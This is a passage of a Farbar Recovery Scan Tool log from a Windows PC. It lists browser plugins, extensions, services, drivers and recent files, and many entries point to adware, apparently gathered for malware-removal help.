FF ProfilePath: C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-07-27] ()
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll [2011-07-18] (Sun Microsystems, Inc.)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-27] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2016-01-12] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2016-01-12] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-04] (VideoLAN)
FF Plugin HKU\S-1-5-21-2978377406-116969058-805938779-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Nexus Media Server\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-07-27] (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2010-10-06] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2010-10-06] (Coupons, Inc.)
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\0rPrrT@gmail.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\39e612de-2951-40c2-ab4a-82e121c42778@4e0cecc2-7c67-4374-bc4c-f15656d80ab7.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\pluswinks@PlusWinks.xpi [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\R0ief33L@gmail.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\rEFDYWMVF@gmail.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\speedanalysis02@SpeedAnalysis.com.xpi [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\VplRH@gmail.com [not found]
FF Extension: No Name - C:\Program Files (x86)\Vuze Remote Toolbar\FF [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\{4D6A6C8E-1EB2-46e1-8CAA-40DAFDE3ED93} [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\{6799a6a5-a100-489a-a077-e10ecb056c19}.xpi [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\info@mp3it.eu [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\{a1ec290a-8ad8-c41a-855e-38572413c1aa} [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\5c8764929678437cbd90994a5a82@ac863d978ade40948f4c7f15bb3c4.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\{a949831f-d9c0-45ae-8c60-91c2a86fbfb6} [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\{D9CFDC5F-081E-420c-A108-A628AC2E556B} [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\helpupdate@dagger2-addons.mozilla.org [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\927571a5c34c476fbf9f2ed9e@8e7e940e6a314c63a357ced35576d.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\9321b276-2c2e-4c5f-bd04-b8118e512707@c0c8a2d6-3275-4cac-a0b2-52e936311db9.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\addictive_typing_lessons@tomkennedy.net [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\addon@defaulttab.com.xpi [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\ausaddonbar@teo.pl [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\d4db60df25f14dae9dd18@185c395f9e794c9ab86be3eb.com [not found]
FF Extension: No Name - C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\extensions\faststartff@gmail.com [not found]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\extensions\{650EED71-89E2-453B-8DCF-2AA1B4AE6EF3} [2016-01-16] [not signed]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\my-prefs.js [2015-03-25] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\my.cfg [2015-03-25] <==== ATTENTION
 
Chrome: 
=======
CHR Profile: C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-16]
CHR Extension: (Google Docs) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-16]
CHR Extension: (Google Drive) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-12]
CHR Extension: (YouTube) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-12]
CHR Extension: (Google Search) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-12]
CHR Extension: (Google Sheets) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-16]
CHR Extension: (Google Docs Offline) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-16]
CHR Extension: (Gmail) - C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-12]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 BrsHelper; C:\Program Files (x86)\YTDownloader\BrowserHelperSrv.exe [112560 2015-04-22] ()
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [417288 2015-11-30] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [507400 2015-11-30] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2011-01-11] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 Program Manager; C:\Program Files (x86)\Common Files\ProgramManager\ProgramManager.exe [954520 2015-06-04] (Spigot, Inc.)
R2 SBSDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe [1153368 2009-01-26] (Safer Networking Ltd.)
R2 WinAudioSrv_R1; C:\Program Files (x86)\Windows Audio\R1\AudioSrv.exe [4024920 2015-04-15] (Hefei Hejunzhengce Info Tech Co., Ltd.)
S3 GoToAssist Remote Support Customer; "C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\857\g2ax_service.exe" "Start=service" [X]
S2 wmmserv_r11; C:\Program Files (x86)\Windows Network Services\v9\wmnserv.exe [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [138872 2011-06-09] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [138872 2011-06-09] (SlySoft, Inc.)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-05-25] (LogMeIn, Inc.)
S4 LMIRfsClientNP; no ImagePath
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2010-01-01] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)
S3 netmon_wfp; C:\Windows\System32\drivers\netmon_wfp.sys [49880 2014-12-03] (Windows ® Win 7 DDK provider)
S3 nvrd64; C:\Windows\system32\DRIVERS\nvrd64.sys [175648 2009-06-30] (NVIDIA Corporation)
R2 sbmntr; C:\Program Files (x86)\YTDownloader\sbmntr.sys [58520 2015-04-22] (YTDownloader)
S3 nusb3hub; system32\DRIVERS\nusb3hub.sys [X]
S3 nusb3xhc; system32\DRIVERS\nusb3xhc.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-15 20:25 - 2016-01-16 15:34 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\BrowserHelper
2016-01-15 19:57 - 2016-01-15 20:02 - 00000000 ____D C:\AdwCleaner
2016-01-15 19:55 - 2016-01-01 03:06 - 00000000 ____D C:\FRST
2016-01-14 20:30 - 2016-01-14 20:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2016-01-14 20:29 - 2016-01-16 16:46 - 00000000 ____D C:\Users\Nexus Media Server\Documents\RTLTOOL
2016-01-14 20:29 - 2016-01-14 21:27 - 04295393 _____ (Igor Pavlov) C:\Users\Nexus Media Server\Documents\mb_driver_lan_realtek_rtltool.exe
2016-01-14 19:49 - 2014-06-17 07:13 - 00941272 _____ (Realtek ) C:\Windows\system32\Drivers\Rt64win7.sys
2016-01-14 19:49 - 2014-06-17 07:13 - 00073800 _____ (Realtek Semiconductor Corporation) C:\Windows\system32\RtNicProp64.dll
2016-01-14 19:48 - 2016-01-16 16:46 - 00000000 ____D C:\Users\Nexus Media Server\Documents\lan_W7
2016-01-14 19:48 - 2016-01-14 20:44 - 03849416 _____ (Igor Pavlov) C:\Users\Nexus Media Server\Documents\motherboard_driver_lan_realtek_8111_w7.exe
2016-01-13 21:36 - 2016-01-13 23:17 - 00000000 ____D C:\Program Files (x86)\GUMF43D.tmp
2016-01-13 21:36 - 2016-01-13 21:52 - 06420480 _____ C:\Program Files (x86)\GUTF43E.tmp
2016-01-13 21:14 - 2016-01-13 23:17 - 00000000 ____D C:\Program Files (x86)\GUM3585.tmp
2016-01-13 21:14 - 2016-01-13 21:14 - 06103040 _____ C:\Program Files (x86)\GUT3586.tmp
2016-01-13 17:56 - 2016-01-13 17:56 - 06420480 _____ C:\Program Files (x86)\GUTC2B3.tmp
2016-01-13 17:56 - 2016-01-13 17:56 - 00000000 _____ C:\Users\Nexus Media Server\AppData\Local\{C884F7E2-CF3E-4B3C-8204-C00A069D82E3}
2016-01-13 17:55 - 2016-01-13 17:55 - 06420480 _____ C:\Program Files (x86)\GUTEE84.tmp
2016-01-13 15:18 - 2016-01-16 16:46 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\U3
2016-01-13 14:55 - 2016-01-13 16:31 - 00000384 _____ C:\Windows\Tasks\DriverToolkit Autorun.job
2016-01-13 14:51 - 2016-01-16 16:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
2016-01-13 14:51 - 2016-01-16 16:45 - 00000000 ____D C:\Program Files (x86)\DriverToolkit
2016-01-13 12:37 - 2016-01-16 16:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
2016-01-13 12:37 - 2016-01-16 16:42 - 00000000 ____D C:\Program Files (x86)\eSupport.com
2016-01-13 12:37 - 2016-01-13 12:40 - 00001290 _____ C:\Users\Nexus Media Server\Desktop\Find Drivers with DriverAgent.lnk
2016-01-13 12:37 - 2016-01-13 12:37 - 00022200 _____ (Phoenix Technologies) C:\Windows\SysWOW64\Drivers\DrvAgent64.SYS
2016-01-13 01:37 - 2016-01-16 16:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-01-13 01:26 - 2016-01-16 16:44 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\ElevatedDiagnostics
2016-01-13 01:25 - 2016-01-16 16:46 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-01-13 01:25 - 2016-01-16 16:42 - 00000000 ____D C:\Program Files\Common Files\AV
2016-01-13 01:22 - 2016-01-16 16:26 - 00000000 ____D C:\Program Files\AVAST Software
2016-01-13 01:21 - 2016-01-16 16:26 - 00000000 ____D C:\ProgramData\AVAST Software
2016-01-13 01:21 - 2016-01-13 01:21 - 05065856 _____ (AVAST Software) C:\Users\Nexus Media Server\Downloads\avast_free_antivirus_setup_online.exe
2016-01-13 01:17 - 2016-01-16 16:45 - 00000000 ____D C:\Windows\pss
2016-01-13 00:49 - 2016-01-16 16:46 - 00000000 ___HD C:\Users\Public\Documents\SystemData
2016-01-12 23:59 - 2016-01-13 11:52 - 00001142 _____ C:\Users\Nexus Media Server\Desktop\Install Kaspersky Security Scan version 15.0.0.740.lnk
2016-01-12 23:59 - 2016-01-12 23:59 - 02172800 _____ (Kaspersky Lab) C:\Users\Nexus Media Server\Downloads\kss15.0.0.740en_es_fr_pt_8648 (1).exe
2016-01-12 23:57 - 2016-01-16 16:45 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-01-12 23:57 - 2016-01-13 11:48 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\etubouwg
2016-01-12 23:56 - 2016-01-12 23:56 - 02172800 _____ (Kaspersky Lab) C:\Users\Nexus Media Server\Downloads\kss15.0.0.740en_es_fr_pt_8648.exe
2016-01-12 23:54 - 2016-01-12 23:54 - 00001064 _____ C:\1.txt
2016-01-12 23:45 - 2016-01-12 23:47 - 00010635 _____ C:\Windows\wininit.ini
2016-01-12 23:11 - 2016-01-16 16:46 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-01-12 23:11 - 2016-01-16 16:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2016-01-12 23:11 - 2016-01-16 16:45 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy
2016-01-12 23:11 - 2016-01-13 11:52 - 00001258 _____ C:\Users\Nexus Media Server\Desktop\Spybot - Search & Destroy.lnk
2016-01-12 23:08 - 2016-01-12 23:09 - 16409960 _____ (Safer Networking Limited ) C:\Users\Nexus Media Server\Downloads\spybotsd162.exe
2016-01-12 22:31 - 2010-01-01 00:02 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-12 22:30 - 2016-01-16 16:47 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-12 22:30 - 2016-01-16 16:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-12 22:30 - 2016-01-16 16:42 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-12 22:30 - 2016-01-13 11:53 - 00001096 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-12 22:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-01-12 22:30 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-01-12 22:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-01-12 22:29 - 2016-01-12 22:30 - 22908888 _____ (Malwarebytes ) C:\Users\Nexus Media Server\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-12 22:26 - 2016-01-16 16:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2016-01-12 22:26 - 2016-01-13 11:53 - 00002249 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-12 22:26 - 2016-01-12 22:26 - 00000918 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d14db2270fc555.job
2016-01-12 22:26 - 2016-01-12 22:26 - 00000918 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-12 22:25 - 2016-01-12 22:26 - 00927824 _____ (Google Inc.) C:\Users\Nexus Media Server\Downloads\ChromeSetup (1).exe
2016-01-01 03:06 - 2016-01-01 03:06 - 00021491 _____ C:\Users\Nexus Media Server\Desktop\FRST.txt
2016-01-01 03:05 - 2016-01-18 15:04 - 02370560 _____ (Farbar) C:\Users\Nexus Media Server\Desktop\FRST64.exe
2016-01-01 01:44 - 2016-01-01 01:46 - 00019920 _____ C:\Users\Nexus Media Server\Desktop\SystemLook.txt
2016-01-01 01:41 - 2016-01-18 13:35 - 00165376 _____ C:\Users\Nexus Media Server\Desktop\SystemLook_x64.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-16 16:47 - 2014-08-01 16:06 - 00000000 ____D C:\Program Files (x86)\YTDownloader
2016-01-16 16:47 - 2012-10-21 08:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2016-01-16 16:47 - 2011-07-18 00:56 - 00000000 ____D C:\Users\Nexus Media Server
2016-01-16 16:47 - 2009-07-13 22:20 - 00000000 ____D C:\Windows
2016-01-16 16:46 - 2015-07-27 13:52 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Citrix
2016-01-16 16:46 - 2015-07-27 13:52 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\Citrix
2016-01-16 16:46 - 2015-07-27 08:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR
2016-01-16 16:46 - 2015-04-26 23:58 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games Bot
2016-01-16 16:46 - 2015-04-19 20:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
2016-01-16 16:46 - 2015-04-19 20:00 - 00000000 ____D C:\ProgramData\Windows VXM
2016-01-16 16:46 - 2015-04-19 08:22 - 00000000 ____D C:\ProgramData\Optimizer
2016-01-16 16:46 - 2014-08-19 22:29 - 00000000 ____D C:\ProgramData\RoboSAvEri
2016-01-16 16:46 - 2014-08-01 16:06 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
2016-01-16 16:46 - 2014-04-29 17:37 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Verizon
2016-01-16 16:46 - 2013-08-02 19:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VZW Utility Application - LG
2016-01-16 16:46 - 2013-06-13 15:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-01-16 16:46 - 2013-05-26 16:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Phone
2016-01-16 16:46 - 2013-05-06 12:07 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoPerformer
2016-01-16 16:46 - 2013-02-16 21:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashPlayer
2016-01-16 16:46 - 2013-01-29 20:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2016-01-16 16:46 - 2012-03-10 23:44 - 00000000 ____D C:\Windows\system32\Macromed
2016-01-16 16:46 - 2011-11-15 15:47 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\News Rover
2016-01-16 16:46 - 2011-10-27 10:22 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MakeMKV
2016-01-16 16:46 - 2011-09-09 13:50 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Boxee
2016-01-16 16:46 - 2011-08-05 10:03 - 00000000 ____D C:\Users\LogMeInRemoteUser
2016-01-16 16:46 - 2011-07-18 02:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SlySoft
2016-01-16 16:46 - 2011-07-18 01:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center
2016-01-16 16:46 - 2011-07-18 00:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-01-16 16:46 - 2009-08-20 18:20 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC
2016-01-16 16:46 - 2009-07-14 00:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 __RHD C:\Users\Public\Libraries
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\SysWOW64\inetsrv
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\inetsrv
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache
2016-01-16 16:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\AppCompat
2016-01-16 16:45 - 2015-07-27 08:32 - 00000000 ____D C:\Program Files (x86)\Itibiti Soft Phone
2016-01-16 16:45 - 2015-07-27 07:36 - 00000000 ____D C:\inetpub
2016-01-16 16:45 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Hollow Interaction
2016-01-16 16:45 - 2015-05-06 20:27 - 00000000 ____D C:\ProgramData\3cf83c400000579b
2016-01-16 16:45 - 2015-04-26 23:43 - 00000000 ___HD C:\ProgramData\dzc
2016-01-16 16:45 - 2015-04-19 20:14 - 00000000 ____D C:\Program Files (x86)\PepperZip
2016-01-16 16:45 - 2015-04-16 18:33 - 00000000 ____D C:\Program Files (x86)\CoolSaleCoupaoNa
2016-01-16 16:45 - 2014-08-21 15:44 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-16 16:45 - 2014-08-19 18:05 - 00000000 ____D C:\ProgramData\EEnjouyCCoupon
2016-01-16 16:45 - 2013-05-16 15:56 - 00000000 ____D C:\Program Files (x86)\DnsBasic
2016-01-16 16:45 - 2013-05-06 12:06 - 00000000 ____D C:\Program Files (x86)\VideoPerformer
2016-01-16 16:45 - 2011-11-15 15:47 - 00000000 ____D C:\NewsRoverData
2016-01-16 16:45 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration
2016-01-16 16:45 - 2009-07-13 22:20 - 00000000 ____D C:\Program Files\Common Files\System
2016-01-16 16:44 - 2015-07-27 13:51 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\Apps\2.0
2016-01-16 16:44 - 2015-05-08 20:13 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\VirtualStore
2016-01-16 16:44 - 2014-08-01 16:05 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\Google
2016-01-16 16:44 - 2013-02-16 21:29 - 00000000 ____D C:\Users\Nexus Media Server\AppData\LocalLow\Conduit
2016-01-16 16:42 - 2013-12-27 19:11 - 00000000 ____D C:\ProgramData\Conduit
2016-01-16 16:42 - 2011-08-03 15:39 - 00000000 ____D C:\Program Files (x86)\LogMeIn
2016-01-16 16:42 - 2011-07-18 01:00 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-01-16 16:42 - 2011-07-18 01:00 - 00000000 ____D C:\Program Files (x86)\Realtek
2016-01-16 16:27 - 2015-06-15 14:58 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\ylbhvtety0k4bjh
2016-01-13 23:17 - 2015-07-27 07:10 - 00000000 ____D C:\Users\Nexus Media Server\AppData\Local\ykxhbzfvy244czg
2016-01-13 23:17 - 2015-06-28 02:48 - 00000000 ____D C:\Program Files (x86)\Broad Photo
2016-01-13 23:17 - 2015-06-28 02:27 - 00000000 ____D C:\Program Files (x86)\WPSNIFFER
2016-01-13 23:17 - 2015-04-26 23:47 - 00000000 ____D C:\ProgramData\{f25570c8-7bf2-0f2a-f255-570c87bfc321}
2016-01-13 23:17 - 2015-04-19 19:35 - 00000000 ____D C:\Program Files (x86)\Sprucemarks
2016-01-13 23:17 - 2015-04-16 18:24 - 00000000 ____D C:\ProgramData\25843018f2844fe49c67328b993d18ab
2016-01-13 17:28 - 2015-07-27 06:56 - 00000000 ____D C:\Program Files (x86)\Tight Requirement
2016-01-13 17:28 - 2015-07-27 06:56 - 00000000 ____D C:\Program Files (x86)\Oblivious Newspaper
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Whopping Boyfriend
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Smoggy Afternoon
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Mammoth Hand
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Jealous Primary
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Intrigued Stop
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Horrific Republic
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Costly External
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Appetizing Editor
2016-01-13 17:28 - 2015-07-27 06:55 - 00000000 ____D C:\Program Files (x86)\Annoyed Bottle
2016-01-13 17:28 - 2015-06-28 06:51 - 00000000 ____D C:\Program Files (x86)\Window Resizer
2016-01-13 17:28 - 2015-06-27 22:26 - 00000000 ____D C:\Program Files (x86)\PerfectPixel by WellDoneCode
2016-01-13 17:28 - 2015-04-27 05:00 - 00000000 ____D C:\Program Files (x86)\Similar Sites
2016-01-13 17:28 - 2015-04-26 20:59 - 00000000 ____D C:\Program Files (x86)\Netflix Trailer Button Adder
2016-01-13 17:28 - 2015-04-26 10:24 - 00000000 ____D C:\Program Files (x86)\RightScale SSH
2016-01-13 17:28 - 2015-04-26 09:52 - 00000000 ____D C:\Program Files (x86)\Counter Strike Best Online Games Collection
2016-01-13 17:28 - 2015-04-19 07:06 - 00000000 ____D C:\Program Files (x86)\SnapPea Photos
2016-01-13 17:28 - 2015-04-18 22:43 - 00000000 ____D C:\Program Files (x86)\Facebook chat ninja
